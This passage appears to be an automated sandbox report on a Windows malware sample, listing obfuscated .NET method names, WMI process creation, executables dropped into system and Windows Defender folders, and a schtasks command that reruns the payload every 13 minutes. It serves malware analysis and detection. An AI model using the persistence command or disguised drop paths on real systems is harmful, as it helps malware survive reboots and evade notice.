Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs	High entropy of concatenated method names: 'q5fuqIoWsp', 'M7yuOolhY1', 'uTeuL87gUW', 'kMOug6kf13', 'gXouaeoff0', 'T27udsCbB2', 'lneuBVqeZF', 'ADXMVsCEKQu8IcuejCw', 'SseZJ0CBR54mSHqJiMh', 'FIuSGCCNiI2HkMg8Vg2'
Source: QT4aLb3P98.exe, ryOWDeYH52AtW3pEx4I.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: QT4aLb3P98.exe, NZKUnsZJnV0LItcaVlq.cs	High entropy of concatenated method names: 'WrJZr7ALox', 'zQyZAaIMFO', 'flIZHc1DiB', 'yIJWiRjK0GmWIqdgtA6', 'vOeSqbjGDU1JC2uuYrp', 'PVtfkTjVEgvV4ircwJ3', 'EpFODRj6ESHF4y1nfN6', 'vaVTYrjD3XSo4aKRTnt', 'FSncAvjL58ERNOnmqBy', 'DSqL9PjdFj4ka85WjFl'
Source: QT4aLb3P98.exe, t58adVZ6Tp3dLCx87je.cs	High entropy of concatenated method names: 'q8qukj816Y', 'fdNuckcKrK', 'WdhpHQb4OYKa9MRWR7a', 'Jk69Ddbx3vrtMkQXq3N', 'U00XEWbgO0jrAnVJnck', 'KcgHTLbtLjSUmEYfU7v', 'jwh3oBbBJ0eIOaYHtcT', 'EB8cTwbNaa54AlN8s5E', 'GZu5C9bEsRM8ceBkJfU', 'kD0CwabnmbGOwJAsGPd'
Source: QT4aLb3P98.exe, owVVNau3ID4pWFRCvRQ.cs	High entropy of concatenated method names: 'iJ2UO1m9mu', 'uHHULC1MjL', 'ax3Uglu6CW', 'tcJwjMgbuaV5CuPiC0G', 'BGak6Ig7DMiNQVT2x9a', 'BaDHyVgCg1fqUfXtQ6h', 'A7UE7pgkSCk5yZDBphU', 'mhAUlWQcI3', 'dwsUPuLW0E', 'f3bU62VT5U'
Source: QT4aLb3P98.exe, M2g42hRTlT3Juk1Iid.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'hpTwHfOraXVhkElNSg8', 'ciroEpOyTrx7I8Vd5rR', 'ig6d3yO4GhyDAGSOmvW', 'FpVQnNOxu4sjB2G8m7J', 'JuwBgZOgsbPtBuMC5kC', 'B0TYeiOtKqsSYYP8IpD'
Source: QT4aLb3P98.exe, uddODc8s6acvvGCZNCT.cs	High entropy of concatenated method names: 'CPqXnMSKat', 'Ye6XIBKY44', 'yN1XwP3oc3', 'MlwxQNDHhJkKbdJyfTa', 'C1qa04DLNFPY144RvtF', 'iUQBQ4DANmHvrfFdCjH', 'bsIdMQDp41GFwwk9517', 'TnSNTcDW714sQ33vM84', 'LaB4fIDTnyk7pYVbX0D', 'gMME43DlgFu2WgAkr5K'
Source: QT4aLb3P98.exe, TLhiHjt0KCFo9M4TEsM.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: QT4aLb3P98.exe, SN0KRnYY7559Wgi9CMG.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: QT4aLb3P98.exe, vVrGC1NPPSVZM9hSUyJ.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'yaksblqPJfw4t4CT2WT', 'oKeFE4q9FCoUGwGGc0m', 'ShkfO6qvnr5r5lbDZWs', 'HY2R4oqXv83DMhYcuPo', 'Ay4we5q29SKaIUTX06F', 'BgLmWFqIsNFFckiHtXE'
Source: QT4aLb3P98.exe, rBD5FkZMePyC2BmrsYt.cs	High entropy of concatenated method names: 'CDpt4RZKUn', 'CnVtj0LItc', 'K2g3u3kEIg0Ei5ASvlJ', 'gqlYPYknUEp4C6t6o9Y', 'IQkkyskBr9wNukdg3mJ', 'y621ZOkND5XLLXbepb3', 'pbptIQk0q3EFC4LOOT4', 'BjC3BKkfC4FhKRo2f37', 'neAiIYkMPV006nhcL5n', 'RmbMbfks0BD8lkVqWsH'
Source: QT4aLb3P98.exe, eCvo6IYRNd4oZMvnetA.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'SStD0AQ17U', 'beuD3tnHlS', 'GScDon52PB', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: QT4aLb3P98.exe, WBG0UTNSjUwClLs4mcC.cs	High entropy of concatenated method names: 'qxYZobrKDh', 'WWDZxqkus6', 'aXk4uOJjl3ExGy6wufN', 'WctLuKJckP4Cha2eJe8', 'KpVmpnJJuCOk83ABxfO', 'bPsXodJ79knp56lpL36', 'hGicFvJCe8TPwX3s8Bh', 'oGJ904JbNjtiGD2R89W', 'oR8FrXJkE65Du7UUFIE', 'wwRvBGJSZ5jJqUdKrVo'
Source: QT4aLb3P98.exe, LCuKj8ZvlvbbJsqDURf.cs	High entropy of concatenated method names: 'Tf0YUjiXrs', 'u9oY0Ug4bY', 'ORZaEnrvxV3Qwj4HZZk', 'T1XPXMrXuEhW2RrO5bK', 'LPIm7brPi8TaGKEElJF', 'D0Biocr90eGaAfAmrTL', 'vWhY6ZLFCK', 'swNMZAyoA3s5PUbaKOj', 'ToWIZrymLDDckrmcaXp', 'ABT74qrihnHeXHIcKZG'
Source: QT4aLb3P98.exe, LWnyVJYJI3UvpfiEQ9Z.cs	High entropy of concatenated method names: 'SDCrTeAyt4', 'e6MrSpY20A', 'o8Arn6Y0CT', 'tMbrI03Js5', 'icDrwwjyuG', 'WvprbpMUgb', '_838', 'vVb', 'g24', '_9oL'
Source: QT4aLb3P98.exe, Tgw1Z0ZLXYf3HIC0jf1.cs	High entropy of concatenated method names: 'd9g8Dw1Z0X', 'hKC393ZI8N6VJvOvTWt', 'Qp19CVZiTQve9q0bbdS', 'WGADdbZXOlTkvPZeOOs', 'SK9m7oZ2i03iKKAf3v5', 'aEirAAZzvv4ZJFaexG0', 'PkREfkrosejnMe3aahu', 'cnQmoIrmLWiUU5ZHCh4', 'xBbhRjraGuo4HWXV1Es', 'rrnkWFrFC8H4wWX40Uq'
Source: QT4aLb3P98.exe, Nks8MkuSKFrHfaZN2Jq.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'IoXebDNUIs', 'mi53tP6VF3', 'LvLewHDe5N', 'lAZ7hqNC5DUfm1UbqfY', 'z26iLZNbnLZTd0g4IqR', 'SaZbWDNk5nFnDT9EEK5', 'CegVLONSxlcePybhkQ9', 'hvVmejNZqQtVVgTEaDR'
Source: QT4aLb3P98.exe, uiWc9RtGKVtbXTJIfcc.cs	High entropy of concatenated method names: '_7zt', 'WL2mpMLSbt', 'XWUmMlpPmj', 'VMGme1H5Qi', 'IfBmVTrtfq', 'NIZm19t9AR', 'fIUmFY1eHD', 'i8meP90BCZwKvgjZfpL', 'SbkHWB0NG7AZP5EPfCj', 'YeGkfD0gLDB6iHpI2KQ'
Source: QT4aLb3P98.exe, VB7ms2ObiBoGsjKUPY.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'jD4iHOANp', 'cI4BfXaV8SAKrdfKp7w', 'rVIn2ia6mD0thXSQJh0', 'yRbAlOaDTYinXIYq5xI', 'sZ6mMDaL4EDm8klmXaQ', 'ArCM8saAhdYrsgNV0eI'
Source: QT4aLb3P98.exe, rWoxi0NH2A6w82H23NQ.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'uWEvQ2RifyePvbtdKwF', 'Ffn3sbRzTpts0Kp3JOb', 'kPPvtP5oLBP0i0ks32n', 'msc59B5m8h0873y9blb', 'nJAT4b5aiwcJxBtd0kM', 'RqX81b5FsDsyqREY64G'
Source: QT4aLb3P98.exe, HLVXDouNnYU2sDwld1D.cs	High entropy of concatenated method names: 'H9rKD8fP3s', 'qZUKsNUCDN', 'OXYKypY7gO', 'YI3KqCoEqO', 'UaF5Eoyz1UMXP2DBvrI', 'tCSJwqyIWGkk8SwHqWM', 'hLpWdTyikZYMdZ1ol3d', 'puTch04oL3fG3DlsDm3', 'aguiGy4mAo1g2KJCIt1', 'V8RnG54ab4CGEXnSqMn'
Source: QT4aLb3P98.exe, Kjm3wWtkkP7cKfE0Myw.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: QT4aLb3P98.exe, xpiIOKNmMjZM7bUdfgm.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'HND1v6qfdPGJaaG1yro', 'QGYjDvqMnejaip6PjQD', 'lBhc4vqscrc13YFAfyk', 'feSsN1q8mLl5HVG6HK6', 'iaGfViqd7idg3xMxoW3', 'pH3cgqqwc8iyW0x9wsj'
Source: QT4aLb3P98.exe, cTSn42tCv2nD65trZkU.cs	High entropy of concatenated method names: 'CddjkCI2Bf', 'u4sjL9utdV', 'tSmjgpngve', 'BxIjaqBINO', 'Deqjd1OdUY', 'ac8jBPODvF', 'VJljvIVj5B', 'JGmjhU9l3t', 'YMZjQ7w4Bs', 'jg2jiAlUlC'
Source: QT4aLb3P98.exe, f0ZvaUfvgmw6viEubD.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'tQlERI1lqF0nshJV9pM', 't7UbgB13gCa2DliJlnQ', 'ePMWq61QLfGVYZQIa1H', 'hvS9fd1YRCIH3lqnRja', 'U6vOq01uXVwqOPHVAna', 'tCvpxK1Ug0320TGMMuC'
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs	High entropy of concatenated method names: 'VOso1n30ofeUx125CoM', 'eKPAST3f4PbasB3DyFC', 'MydKWw3E7nZJhwuXVhd', 'F8tHrx3nL5hpFRQPinN', 'h7iyjBQ8C0', 'vm7ujZ380fPqpSrW2yo', 'l8QxET3dALdTuwuIw1A', 'JLvCnN3wFpUoG5HrIRu', 'z7wE6D3Klmmq36wMFNi', 'cZQr2d3G23NDMSWZwZl'
Source: QT4aLb3P98.exe, BTLjiFZ1TPXQi1ln8br.cs	High entropy of concatenated method names: 'xpDtewtPFD', 'GtItVPqoj6', 'Nv1t1jsBrB', 'vL0tFAbidY', 'ViftXC0shI', 'IxlHxjSoxDu6ywfyCvd', 'ps5jMISm5igdRX18lt9', 'hHUq55kiOq3wbfMLZ61', 'kD1cm3kzh5qa8XA6jrD', 'HuuR9NSaLJWhxDtftgP'
Source: QT4aLb3P98.exe, VdeGXIIcFBlHTuEbpR.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'YTxKEh1hklpbQFU7jZN', 'VaQEex1q7acNT2MUpln', 'aGL4uL1RgYqv3CnFYGC', 'QgIGH81512hfiJvyTDQ', 'QBNYRO1cTG1f7DB3Vyw', 'j7l5LL1JQfh0nZMYdq2'
Source: QT4aLb3P98.exe, jKZ0VDNuv9wwwXiK5NM.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'XdfRvBh897kAg3GxHtr', 'YVGKpQhdJb2SyiyN68K', 'EagAbrhwmBNAw3oYcQ5', 'cWf8lShKYRaPNI04wVL', 'w5rmhThG0fmSJLlEP9N', 'L8uka8hVEg0ZCCyih1Q'
Source: QT4aLb3P98.exe, X0Nd8igyK80AYELy4R.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'j90UIAaIYl6CWSamMOs', 'zsfvj7aiMfikMG5ihEo', 'LgOjuEaztuM3PjcuWxC', 'l1d6KlFoHvqsHZHLxTW', 'jO2hi6FmCHdXBq14w0q', 'fL6lSOFanu1Ru14QvmE'
Source: QT4aLb3P98.exe, Bp4ZB3NWjZla5GrHXP7.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'WOd5WfRoJxqdSlxXETE', 'zW4pO5RmuY2PkFfRied', 'WcuWc9RajpfxklqZDGG', 'v6mfHYRFRgMCk1eWkMj', 'NWLJd7ROj6jFhpVXnx3', 'ybpBIPR1NbAd7UymasB'
Source: QT4aLb3P98.exe, DBFF6cNcMUnhCquT18O.cs	High entropy of concatenated method names: 'TnDZ1M33wb', 'wE8ZFPxa9w', 'y4CZXIVcpT', 'CWwhcJjJoKdkPDUVb8g', 'wKkPdej5mklbCClkTBX', 'grer40jcNcIPNBZxnFD', 'NBPIx6jjuZdrWCSOanX', 'nNyPLIj7E36K9QCeyVs', 'zVPy97jCa3Zr268LEY7', 'qfQ2TMjbWNPDNFfX7uN'
Source: QT4aLb3P98.exe, amB5IBNVT21egwIQ4uC.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'smIct9REaSMrsgduqch', 'EBVi6SRnqA2DECLYutN', 'BwAv8YR0411neRw4RSt', 'xguWtMRflw4eohOHPDv', 'feDIAYRMhaChlPsUuw8', 'EGG0rDRsjsH6VKKVPQg'
Source: QT4aLb3P98.exe, GjJqNONfLJn1EnSVkIw.cs	High entropy of concatenated method names: 'AXEZp0osTL', 'j3uq5ajhHwclq0uVjSl', 'S6CXRWjqWpymJ8cRCeU', 'DTbvAajOOMPvgFhfWh4', 'J1jRJHj1fwFw0lotXro', 'qRlbgcjRnssUeZhvZb4', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: QT4aLb3P98.exe, z4Q5Xb8HQoib0P58lWy.cs	High entropy of concatenated method names: 'giwXBpB57h', 'EglXvf3GJ4', 'qxPXhU3pM8', 'nhhXQ7P4cy', 'xVFXiCFN6p', 'ty9P36DMJcapQwcrpH1', 'tvQ3ujD0SP8FY6pM94q', 'gCe0h0Dfxut3lJppkLH', 'VST3hUDs70XwFW8Bt75', 'JwLyhDD8hxwmXkxY70O'
Source: QT4aLb3P98.exe, LkOdUWuIRPdAfy4FVCp.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'juYeJXI4pv', '_168', 'tM3oEVNnJH7whO1W3KK', 'QlnW7AN0n82K1Z2FeOC', 'BGMVT7NfX4LZFgBFtO1', 'tycAraNM38JcAY5Qwa6', 'xiVNg0NslDblaqPyqfp'
Source: QT4aLb3P98.exe, vC283A89eGfXw91Enbe.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: QT4aLb3P98.exe, kC8ruJY2wXCeCi0Zmua.cs	High entropy of concatenated method names: 'zWyH0bjoyJ', 'm7GH3EwwEj', 'RYtHoFS2Mx', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'BXlHxrcgpi'
Source: QT4aLb3P98.exe, uqhbAr8LI1LKAoANRxZ.cs	High entropy of concatenated method names: 'lAYrJy2Ewl', 'jY3oxfD2nrdm0QwxifS', 'QsUdgSDv3pQc1UTUuQx', 'KExcWVDXlmZVQ1fsa9D', 'BXcp1cDIwb9WoenMeEb', 'YZE9a0Di7LatiPPXt9c', 'Q0wNcvDzTdP3CAF4hvb'
Source: QT4aLb3P98.exe, SfTBeSNjc7p3pKOouCM.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'IIo6r3qAtG2HrL05GF8', 'OWPhaaqHyQ14lavkLTC', 'SrWmDhqpc2MjQrgbHuA', 'YZHvJjqWnxywXIWS5Sp', 'UPWgrFqTLlHH66vqhpU', 'DEYhhJqlGQ2pxgjEIG2'
Source: QT4aLb3P98.exe, lwOADkzMmEhwsmc6g4.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'unwTcDhF5g3L7cYY3Xh', 'LeGHHFhOZw3SYQRbLI2', 'cBSmmqh1Gkxx6quCWUL', 'tMPDP6hhNUL4IE8paOk', 'RaY1YDhqUuNg6jloxwJ', 'HkdURPhRVihAdVvYu7V'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Media\Sonata\wRRcPdViqk.exe

Jump to behavior

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe			Jump to dropped file
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe			Jump to dropped file

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

File created: C:\Windows\Media\Sonata\wRRcPdViqk.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\QT4aLb3P98.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
